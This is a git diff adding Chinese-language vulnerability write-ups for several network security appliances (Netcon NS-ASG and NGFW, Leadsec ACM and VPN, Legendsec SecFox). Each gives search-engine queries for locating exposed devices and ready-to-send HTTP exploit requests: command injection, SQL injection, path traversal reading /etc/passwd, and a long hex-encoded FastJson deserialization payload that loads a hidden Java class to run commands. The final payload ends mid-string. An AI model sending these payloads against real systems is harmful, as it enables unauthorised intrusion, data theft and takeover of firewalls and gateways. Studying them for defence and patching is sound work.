diff --git a/网康NS-ASG应用安全网关存在远程命令执行漏洞.md b/网康NS-ASG应用安全网关存在远程命令执行漏洞.md
new file mode 100644
index 0000000..a45b0d3
--- /dev/null
+++ b/网康NS-ASG应用安全网关存在远程命令执行漏洞.md
@@ -0,0 +1,47 @@
+# 网康 NS-ASG应用安全网关存在远程命令执行漏洞
+
+# 一、漏洞简介
+网康科技有限公司是中国技术领先的网络应用管理设备提供商，专注于网络应用管理领域最前沿的趋势研究和分析，为用户提供先进的网络应用管理技术、产品与解决方案，旨在帮助用户实现“上好网 用好网”的网络管理目标。网康应用安全网关系统存在远程命令执行漏洞，攻击者通过漏洞可以执行任意命令，导致服务器失陷。
+
+# 二、影响版本
++ 网康应用安全网关系统
+
+# 三、资产测绘
++ hunter`web.title=="网康 NS-ASG 应用安全网关"`
++ 特征
+
+![1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be.png](./img/Q3wbZCP7nLEzpjt6/1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be-739231.png)
+
+# 四、漏洞复现
+1. 执行如下执行POC语句，同时执行id命令并写入/protocol/1.txt。
+
+```plain
+POST /protocol/index.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 76
+
+jsoncontent={"protocolType":"getsysdatetime","messagecontent":"1;id>1.txt;"}
+```
+
+![1700040012683-b9714aa9-b738-429c-8700-a475eff2249d.png](./img/Q3wbZCP7nLEzpjt6/1700040012683-b9714aa9-b738-429c-8700-a475eff2249d-740368.png)
+
+2. 访问`/protocol/1.txt`路径，获取命令执行结果。
+
+```plain
+/protocol/1.txt
+```
+
+![1700040060126-ae08016a-0a0f-4e4c-9821-38261430e5ce.png](./img/Q3wbZCP7nLEzpjt6/1700040060126-ae08016a-0a0f-4e4c-9821-38261430e5ce-691820.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zut666gci4d1s4sv>
\ No newline at end of file
diff --git a/网康NS-ASG应用安全网关源代码泄露漏洞.md b/网康NS-ASG应用安全网关源代码泄露漏洞.md
new file mode 100644
index 0000000..83c3df8
--- /dev/null
+++ b/网康NS-ASG应用安全网关源代码泄露漏洞.md
@@ -0,0 +1,25 @@
+# 网康NS-ASG应用安全网关源代码泄露漏洞
+
+# 一、漏洞简介
+网康科技有限公司是中国技术领先的网络应用管理设备提供商，专注于网络应用管理领域最前沿的趋势研究和分析，为用户提供先进的网络应用管理技术、产品与解决方案，旨在帮助用户实现“上好网 用好网”的网络管理目标。网康NS-ASG应用安全网关源代码泄露漏洞。
+
+# 二、影响版本
++ 网康应用安全网关系统
+
+# 三、资产测绘
++ hunter`web.title=="网康 NS-ASG 应用安全网关"`
++ 特征
+
+![1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be.png](./img/R8mmLlumkKNVglOe/1700039945096-d99e24a4-9e98-4951-b4bf-3ec53154e6be-489191.png)
+
+# 四、漏洞复现
+```java
+/protocol/nsasg6.0.tgz
+```
+
+![1704937144520-c89aac48-4a8b-4382-8cbb-a8c1cca3cdf8.png](./img/R8mmLlumkKNVglOe/1704937144520-c89aac48-4a8b-4382-8cbb-a8c1cca3cdf8-167281.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kxdvhozga8301k9t>
\ No newline at end of file
diff --git a/网康下一代防火墙远程命令执行漏洞.md b/网康下一代防火墙远程命令执行漏洞.md
new file mode 100644
index 0000000..bb7fd4b
--- /dev/null
+++ b/网康下一代防火墙远程命令执行漏洞.md
@@ -0,0 +1,50 @@
+# 网康下一代防火墙远程命令执行漏洞
+
+# 一、漏洞简介
+网康下一代防火墙(NGFW) 是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。凭借超强的应用识别能力，下一代防火墙可深入洞察网络流量中的用户、应用和内容，借助全新的高性能单路径异构并行处理引擎，在互联网出口、数据中心边界、应用服务前端等场景提供高效的应用层一体化安全防护帮助用户安全地开展业务并降低安全成本。该设备存在远程命令执行漏洞，通过此漏洞攻击者可远程写入webshell木马，远程控制防火墙。
+
+# 二、影响版本
++ 网康下一代防火墙(NGFW)
+
+# 三、资产测绘
++ hunter`app.name="网康 NGFW"`
++ 特征
+
+![1700672214892-89badb4c-3b88-4fad-9bc7-d88920136c28.png](./img/yXZacA-Wy_HtI0DL/1700672214892-89badb4c-3b88-4fad-9bc7-d88920136c28-725692.png)
+
+# 四、漏洞复现
+执行命令`cat /etc/passwd`,将命令执行结果写入`/var/www/html/stc.txt`
+
+```python
+POST /directdata/direct/router HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=mrii60g5vlu8hnen3v0cdk13t6; ys-active_page=s%3A
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+Content-Type: application/json
+Content-Length: 172
+
+{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/stc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
+```
+
+获取命令执行结果
+
+```python
+/stc.txt
+```
+
+![1700672285345-7cc2adaa-94f7-4c3c-bd2f-7cc73470a49f.png](./img/yXZacA-Wy_HtI0DL/1700672285345-7cc2adaa-94f7-4c3c-bd2f-7cc73470a49f-238968.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rp9svkal7uuo5is6>
\ No newline at end of file
diff --git a/网康科技-NS-ASG-应用安全网关-SQL注入漏洞(CVE-2024-2330).md b/网康科技-NS-ASG-应用安全网关-SQL注入漏洞(CVE-2024-2330).md
new file mode 100644
index 0000000..41abd2c
--- /dev/null
+++ b/网康科技-NS-ASG-应用安全网关-SQL注入漏洞(CVE-2024-2330).md
@@ -0,0 +1,22 @@
+## 网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)
+
+
+## poc
+```
+POST /protocol/index.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+Te: trailers
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 263
+
+jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
+```
diff --git a/网御ACM上网行为管理系统bottomframe.cgiSQL注入漏洞.md b/网御ACM上网行为管理系统bottomframe.cgiSQL注入漏洞.md
new file mode 100644
index 0000000..4cf7538
--- /dev/null
+++ b/网御ACM上网行为管理系统bottomframe.cgiSQL注入漏洞.md
@@ -0,0 +1,38 @@
+# 网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
+
+# 一、漏洞简介
+网御上网行为管理系统具备一体化网络接入、认证、管控、优化、审计、运营等功能,是新一代高性能的上网行为管理产品。面向政府、军工、金融、教育、企业等多行业不同客户网络业务场景，简化管理，节约客户成本，提供业务效率和价值。网御ACM上网行为管理系统存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 网御上网行为管理系统
+
+# 三、资产测绘
++ hunter：`app.name="LeadSec 网御星云 ACM"`
+
+![1692091516996-e14a3fea-afe4-498a-8cb0-cb8bf8eb6ad2.png](./img/smjw_DZ0Z3nT853F/1692091516996-e14a3fea-afe4-498a-8cb0-cb8bf8eb6ad2-429151.png)
+
++ 登录页面
+
+![1692091551867-d771bb3c-8490-4b04-b8bf-11142bcb954e.png](./img/smjw_DZ0Z3nT853F/1692091551867-d771bb3c-8490-4b04-b8bf-11142bcb954e-939492.png)
+
+# 四、漏洞复现
+```plain
+GET /bottomframe.cgi?user_name=%27))%20union%20select%20user()%23 HTTP/1.1
+Host: xx.xx.xx.xx
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0
+```
+
+![1692091602115-e4c1e46d-7de4-4e4b-89b9-e77626b14efe.png](./img/smjw_DZ0Z3nT853F/1692091602115-e4c1e46d-7de4-4e4b-89b9-e77626b14efe-446439.png)
+
+
+
+> 更新: 2024-02-29 23:57:15  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/us2xh5hyekelzowk>
\ No newline at end of file
diff --git a/网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md b/网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md
new file mode 100644
index 0000000..78213b4
--- /dev/null
+++ b/网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞.md
@@ -0,0 +1,17 @@
+## 网御ACM上网行为管理系统bottomframe.cgi存在SQL注入漏洞
+
+网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞，攻击者通过漏洞可以获取服务器数据库敏感信息
+
+## fofa
+
+```
+app="网御星云-上网行为管理系统"
+```
+
+## poc
+
+```javascript
+/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409191348040.png)
diff --git a/网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md b/网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md
new file mode 100644
index 0000000..1386fbb
--- /dev/null
+++ b/网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014).md
@@ -0,0 +1,22 @@
+# 网御VPN安全网关存在任意文件下载漏洞(CNVD-2024-34014)
+
+网御VPN安全网关存在任意文件下载漏洞，攻击者可利用该漏洞在未经身份验证的情况下下载passwd等敏感文件。
+
+## poc
+
+```javascript
+GET /SSL/admin/UserFile?FileName=../../../etc/passwd HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/UXujNlADrykn2NSREuwDWQ
+- [国家信息安全漏洞共享平台 (cnvd.org.cn)](https://www.cnvd.org.cn/flaw/show/CNVD-2024-34014)
\ No newline at end of file
diff --git a/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md b/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md
new file mode 100644
index 0000000..af5282e
--- /dev/null
+++ b/网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞.md
@@ -0,0 +1,33 @@
+# 网神SecFox运维安全管理与审计系统FastJson反序列化RCE漏洞
+
+网神SecFox运维安全管理与审计系统 authService接口处使用存在漏洞 fastjson 组件，未授权的攻击者可通过fastjson 序列化漏洞对系统发起攻击获取服务器权限。
+
+## fofa
+```javascript
+body="./static/js/vendor.022b3d3adf3423f31f54.js"
+```
+
+## poc
+```javascript
+POST /3.0/authService/login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
+Cmd: id
+Content-Type: application/json;charset=utf-8
+Referer: https://
+Accept-Encoding: gzip
+Connection: close
+
+{
+    "a": {
+        "@type": "java.lang.Class", 
+        "val": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource"
+    }, 
+    "b": {
+        "@type": "com.mchange.v2.c3p0.WrapperConnectionPoolDataSource", 
+        "userOverridesAsString": "HexAsciiSerializedMap:aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200206a617661782e7363726970742e536372697074456e67696e654d616e61676572000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000074000b6e6577496e7374616e6365757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007371007e00137571007e0018000000017400026a7374000f676574456e67696e6542794e616d657571007e001b00000001767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707371007e00137571007e00180000000174202b747279207b0a20206c6f616428226e6173686f726e3a6d6f7a696c6c615f636f6d7061742e6a7322293b0a7d20636174636820286529207b7d0a66756e6374696f6e20676574556e7361666528297b0a202076617220746865556e736166654d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e556e7361666522292e6765744465636c617265644669656c642827746865556e7361666527293b0a2020746865556e736166654d6574686f642e73657441636365737369626c652874727565293b200a202072657475726e20746865556e736166654d6574686f642e676574286e756c6c293b0a7d0a66756e6374696f6e2072656d6f7665436c617373436163686528636c617a7a297b0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617a7a416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c61737328636c617a7a2c6a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c61737322292e6765745265736f75726365417353747265616d2822436c6173732e636c61737322292e72656164416c6c427974657328292c6e756c6c293b0a2020766172207265666c656374696f6e446174614669656c64203d20636c617a7a416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428227265666c656374696f6e4461746122293b0a2020756e736166652e7075744f626a65637428636c617a7a2c756e736166652e6f626a6563744669656c644f6666736574287265666c656374696f6e446174614669656c64292c6e756c6c293b0a7d0a66756e6374696f6e206279706173735265666c656374696f6e46696c7465722829207b0a2020766172207265666c656374696f6e436c6173733b0a2020747279207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a646b2e696e7465726e616c2e7265666c6563742e5265666c656374696f6e22293b0a20207d20636174636820286572726f7229207b0a202020207265666c656374696f6e436c617373203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e7265666c6563742e5265666c656374696f6e22293b0a20207d0a202076617220756e73616665203d20676574556e7361666528293b0a202076617220636c617373427566666572203d207265666c656374696f6e436c6173732e6765745265736f75726365417353747265616d28225265666c656374696f6e2e636c61737322292e72656164416c6c427974657328293b0a2020766172207265666c656374696f6e416e6f6e796d6f7573436c617373203d20756e736166652e646566696e65416e6f6e796d6f7573436c617373287265666c656374696f6e436c6173732c20636c6173734275666665722c206e756c6c293b0a2020766172206669656c6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226669656c6446696c7465724d617022293b0a2020766172206d6574686f6446696c7465724d61704669656c64203d207265666c656374696f6e416e6f6e796d6f7573436c6173732e6765744465636c617265644669656c6428226d6574686f6446696c7465724d617022293b0a2020696620286669656c6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286669656c6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a2020696620286d6574686f6446696c7465724d61704669656c642e6765745479706528292e697341737369676e61626c6546726f6d286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292929207b0a20202020756e736166652e7075744f626a656374287265666c656374696f6e436c6173732c20756e736166652e7374617469634669656c644f6666736574286d6574686f6446696c7465724d61704669656c64292c206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e486173684d617022292e676574436f6e7374727563746f7228292e6e6577496e7374616e63652829293b0a20207d0a202072656d6f7665436c6173734361636865286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173732229293b0a7d0a66756e6374696f6e2073657441636365737369626c652861636365737369626c654f626a656374297b0a2020202076617220756e73616665203d20676574556e7361666528293b0a20202020766172206f766572726964654669656c64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e7265666c6563742e41636365737369626c654f626a65637422292e6765744465636c617265644669656c6428226f7665727269646522293b0a20202020766172206f6666736574203d20756e736166652e6f626a6563744669656c644f6666736574286f766572726964654669656c64293b0a20202020756e736166652e707574426f6f6c65616e2861636365737369626c654f626a6563742c206f66667365742c2074727565293b0a7d0a66756e6374696f6e20646566696e65436c617373286279746573297b0a202076617220636c7a203d206e756c6c3b0a20207661722076657273696f6e203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226a6176612e76657273696f6e22293b0a202076617220756e73616665203d20676574556e7361666528290a202076617220636c6173734c6f61646572203d206e6577206a6176612e6e65742e55524c436c6173734c6f61646572286a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6e65742e55524c22292c203029293b0a20207472797b0a202020206966202876657273696f6e2e73706c697428222e22295b305d203e3d20313129207b0a2020202020206279706173735265666c656374696f6e46696c74657228293b0a20202020646566696e65436c6173734d6574686f64203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e6c616e672e436c6173734c6f6164657222292e6765744465636c617265644d6574686f642822646566696e65436c617373222c206a6176612e6c616e672e436c6173732e666f724e616d6528225b4222292c6a6176612e6c616e672e496e74656765722e545950452c206a6176612e6c616e672e496e74656765722e54595045293b0a2020202073657441636365737369626c6528646566696e65436c6173734d6574686f64293b0a202020202f2f20e7bb95e8bf872073657441636365737369626c65200a20202020636c7a203d20646566696e65436c6173734d6574686f642e696e766f6b6528636c6173734c6f616465722c2062797465732c20302c2062797465732e6c656e677468293b0a202020207d656c73657b0a2020202020207661722070726f74656374696f6e446f6d61696e203d206e6577206a6176612e73656375726974792e50726f74656374696f6e446f6d61696e286e6577206a6176612e73656375726974792e436f6465536f75726365286e756c6c2c206a6176612e6c616e672e7265666c6563742e41727261792e6e6577496e7374616e6365286a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e73656375726974792e636572742e436572746966696361746522292c203029292c206e756c6c2c20636c6173734c6f616465722c205b5d293b0a202020202020636c7a203d20756e736166652e646566696e65436c617373286e756c6c2c2062797465732c20302c2062797465732e6c656e6774682c20636c6173734c6f616465722c2070726f74656374696f6e446f6d61696e293b0a202020207d0a20207d6361746368286572726f72297b0a202020206572726f722e7072696e74537461636b547261636528293b0a20207d66696e616c6c797b0a2020202072657475726e20636c7a3b0a20207d0a7d0a66756e6374696f6e206261736536344465636f6465546f427974652873747229207b0a20207661722062743b0a20207472797b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d65282273756e2e6d6973632e4241534536344465636f64657222292e6e6577496e7374616e636528292e6465636f646542756666657228737472293b0a20207d63617463682865297b7d0a2020696620286274203d3d206e756c6c297b0a202020207472797b0a2020202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226a6176612e7574696c2e42617365363422292e6e6577496e7374616e636528292e6765744465636f64657228292e6465636f646528737472293b0a202020207d63617463682865297b7d0a20207d0a2020696620286274203d3d206e756c6c297b0a202020206274203d206a6176612e6c616e672e436c6173732e666f724e616d6528226f72672e6170616368652e636f6d6d6f6e732e636f6465632e62696e6172792e42617365363422292e6e6577496e7374616e636528292e6465636f646528737472290a20207d0a202072657475726e2062743b0a7d0a76617220636f64653d2279763636766741414144494177516f41435142524367425341464d4b414649415641674156516f4156674258434142594277425a4367414841466f484146734b41467741585167415867674158776741594167415951674159676f414277426a4341426b4341426c4277426d43674263414763494147674b4144304161516f41435142714341427243414273434142744341427543674154414738494148414b4148454163676f414577427a43674154414851494148554b41424d4164676741647767416541634165516f414a5142524367416c41486f494148734b414355416641674166516741666767416677674167416f41675143434367434241494d484149514b4149554168676f414d414348434143494367417741496b4b4144414169676f414d41434c436743464149774b414955416a5163416a676f414f5142384341435043674139414a4148414a454241415938615735706444344241414d6f4b565942414152446232526c4151415054476c755a55353162574a6c636c5268596d786c4151414c614746755a464a6c6358566c633351424141704665474e6c634852706232357a415141455a58686c597745414a69684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576624746755a79395464484a70626d63374151414e553352685932744e5958425559574a735a5163415a6763416b6763416b77634168416341655163416a6763416c4145414344786a62476c756158512b4151414b55323931636d4e6c526d6c735a51454143464e464d53357159585a684441412b41443848414a554d414a59416c7777416d41435a4151413862334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4a6c6358566c63335244623235305a586830534739735a4756794277436144414362414a77424142526e5a5852535a5846315a584e3051585230636d6c696458526c6377454144327068646d4576624746755a7939446247467a637777416e51436541514151616d4632595339735957356e4c303969616d566a644163416e7777416f4143684151424162334a6e4c6e4e77636d6c755a325a795957316c64323979617935335a5749755932397564475634644335795a5846315a584e304c6c4e6c636e5a735a5852535a5846315a584e3051585230636d6c696458526c637745414332646c64464a6c63334276626e4e6c4151414b5a325630556d56786457567a6441454148577068646d46344c6e4e6c636e5a735a58517555325679646d786c64464a6c63334276626e4e6c4151414a5a32563056334a706447567944414369414a34424143567159585a686543357a5a584a32624756304c6d6830644841755348523063464e6c636e5a735a5852535a5846315a584e304151414a5a325630534756685a47567941514151616d4632595339735957356e4c314e30636d6c755a7777416f77436b415141445932316b444142454145554d414b5541706745414233427961573530624734424141566d6248567a6141454142574e7362334e6c415141414441436e414b674241416476637935755957316c42774370444143714145554d414b734172417741725143734151414464326c7544414375414b3842414152776157356e415141434c5734424142647159585a684c327868626d6376553352796157356e516e56706247526c636777417341437841514146494331754944514d414c4941724145414169396a41514146494331304944514241414a7a614145414169316a4277437a44414330414c554d414551417467454145577068646d4576645852706243395459324675626d56794277435344414333414c674d4144344175514541416c786844414336414c734d414c774176517741766743734441432f414c674d414d41415077454145327068646d4576624746755a79394665474e6c63485270623234424142426a623231745957356b494735766443427564577873444142434144384241414e54525445424142467159585a684c327868626d637655484a765932567a637745414531744d616d4632595339735957356e4c314e30636d6c755a7a734241424e7159585a684c327868626d63765647687962336468596d786c41514151616d4632595339735957356e4c31526f636d56685a41454144574e31636e4a6c626e525561484a6c595751424142516f4b55787159585a684c327868626d6376564768795a57466b4f7745414657646c64454e76626e526c654852446247467a633078765957526c636745414753677054477068646d4576624746755a7939446247467a633078765957526c636a73424142567159585a684c327868626d63765132786863334e4d6232466b5a58494241416c736232466b5132786863334d424143556f54477068646d4576624746755a79395464484a70626d63374b55787159585a684c327868626d63765132786863334d374151414a5a325630545756306147396b415142414b45787159585a684c327868626d6376553352796157356e4f31744d616d4632595339735957356e4c304e7359584e7a4f796c4d616d4632595339735957356e4c334a6c5a6d786c59335176545756306147396b4f77454147477068646d4576624746755a7939795a575a735a574e304c30316c644768765a414541426d6c75646d39725a5145414f53684d616d4632595339735957356e4c303969616d566a6444746254477068646d4576624746755a793950596d706c593351374b55787159585a684c327868626d637654324a715a574e304f7745414557646c6445526c59327868636d566b545756306147396b4151414e6332563051574e6a5a584e7a61574a735a514541424368614b5659424141686e5a5852446247467a637745414579677054477068646d4576624746755a7939446247467a637a734241415a6c6358566862484d424142556f54477068646d4576624746755a793950596d706c593351374b566f424142427159585a684c327868626d637655336c7a644756744151414c5a32563055484a766347567964486b424141743062307876643256795132467a5a5145414643677054477068646d4576624746755a79395464484a70626d63374151414564484a706251454143474e76626e52686157357a415141624b45787159585a684c327868626d637651326868636c4e6c6358566c626d4e6c4f796c6141514147595842775a57356b415141744b45787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c314e30636d6c755a304a316157786b5a584937415141496447395464484a70626d63424142467159585a684c327868626d6376556e567564476c745a514541436d646c64464a31626e5270625755424142556f4b55787159585a684c327868626d6376556e567564476c745a5473424143676f5730787159585a684c327868626d6376553352796157356e4f796c4d616d4632595339735957356e4c31427962324e6c63334d374151414f5a325630535735776458525464484a6c595730424142636f4b55787159585a684c326c764c306c7563485630553352795a5746744f7745414743684d616d4632595339706279394a626e423164464e30636d566862547370566745414448567a5a55526c62476c746158526c636745414a79684d616d4632595339735957356e4c314e30636d6c755a7a737054477068646d4576645852706243395459324675626d56794f774541423268686330356c6548514241414d6f4b566f42414152755a5868304151414f5a32563052584a7962334a5464484a6c595730424141646b5a584e30636d3935414345415051414a4141414141414145414145415067412f4141454151414141414230414151414241414141425371334141477841414141415142424141414142674142414141414541414a41454941507741434145414141414679414159414377414141524b3441414b3241414d53424c594142557371456759447651414874674149544373424137304143625941436b323441414b3241414d53433759414255737145677744765141487467414954436f5344514f39414165324141684f4b7977447651414a7467414b4f6751744c414f3941416d3241416f3642626741417259414178494f746741464567384476514148746741514f67613441414b3241414d534562594142524953424c304142316b4445684e54746741514f67635a427753324142515a426753324142515a42686b454137304143625941436a6f494751635a4251533941416c5a417849565537594143734141457a6f4a47516d344142593643686b4974674158456867457651414857514d5345314f324142415a4341533941416c5a41786b4b55375941436c635a434c59414678495a413730414237594145426b494137304143625941436c635a434c594146784961413730414237594145426b494137304143625941436c657841414141415142424141414154674154414141414577414d41425141467741564143454146674174414263414f41415941454d414751424f41426f4157514162414738414841434b414230416b414165414a59414877436a4143414175414168414c38414967446841434d412b51416b415245414a514244414141414241414241446b41435142454145554141514241414141436e41414541416741414145324b7359424d6849624b725941484a6f424b5249647541416574674166544371324143424c41553042546973534962594149706b4150796f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456969324143653241436c4c4272304145316b4445685654575151534b6c4e5a425370545471634150436f534937594149706b4149436f534a4c594149706f41463773414a566d33414359717467416e456975324143653241436c4c4272304145316b4445697854575151534c564e5a42537054547267414c6932324143394e757741775753793241444733414449534d3759414e446f45475153324144575a4141735a424c59414e716341425249624f6757374144425a4c4c59414e3763414d68497a746741304f6753374143565a7477416d475157324143635a424c59414e5a6b4143786b457467413270774146456875324143653241436b3642526b464f675973786741484c4c59414f426b4773446f454751533241446f3642537a474141637374674134475157774f676373786741484c4c59414f426b487678493773414145414a30424277455341446b416e5145484153594141414553415273424a674141415359424b41456d41414141416742424141414165674165414141414b41414e41436b4146674171414273414b7741644143774148774174414367414c6741364143384154674178414751414d7742324144514169674132414a30414f51436c41446f4174774137414d734150414464414430424177412b415163415167454c41454d424477412b41524941507745554145414247774243415238415177456a414541424a6742434153774151774577414555424d77424841455941414143304141372b41453448414563484145674841456b564a524c3841436b4841457042427742482f7741764141594841456348414563484145674841456b4841456f4841456341